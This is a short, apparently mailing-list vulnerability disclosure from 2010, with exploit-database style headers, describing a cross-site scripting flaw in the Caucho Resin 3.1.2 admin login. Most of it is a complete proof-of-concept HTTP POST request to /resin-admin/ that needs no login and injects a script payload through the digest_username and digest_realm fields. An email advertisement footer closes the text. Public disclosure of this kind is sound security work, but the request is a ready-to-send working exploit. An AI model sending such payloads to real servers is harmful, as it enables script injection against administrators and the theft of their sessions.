hi,brother,I want to post a vul of Caucho Resin web server # Exploit Title:Caucho Resin web server 3.1.2 Admin Login digest_username&digest_realm XSS Vulnerability # Date: 2010-05-17 # Author: flyh4t # Software Link: http://www.caucho.com/ # Version: Professional 3.1.2 # CVE : no P0C:(no need of login) POST /resin-admin/ HTTP/1.1 Accept: */* Referer: http://1.1.1.1/resin-admin/ Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; msn OptimizedIE8;ZHCN) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: 1.1.1.1 Content-Length: 194 Connection: Keep-Alive Cache-Control: no-cache Cookie: JSESSIONID=abc7CGMIyBwpNgFko8MIs digest_username=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22&digest_password1=&digest_password2=&digest_realm=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22&digest_attempt=true _________________________________________________________________ 想知道明天天气如何?必应告诉你! http://cn.bing.com/search?q=%E5%A4%A9%E6%B0%94%E9%A2%84%E6%8A%A5&form=MICHJ2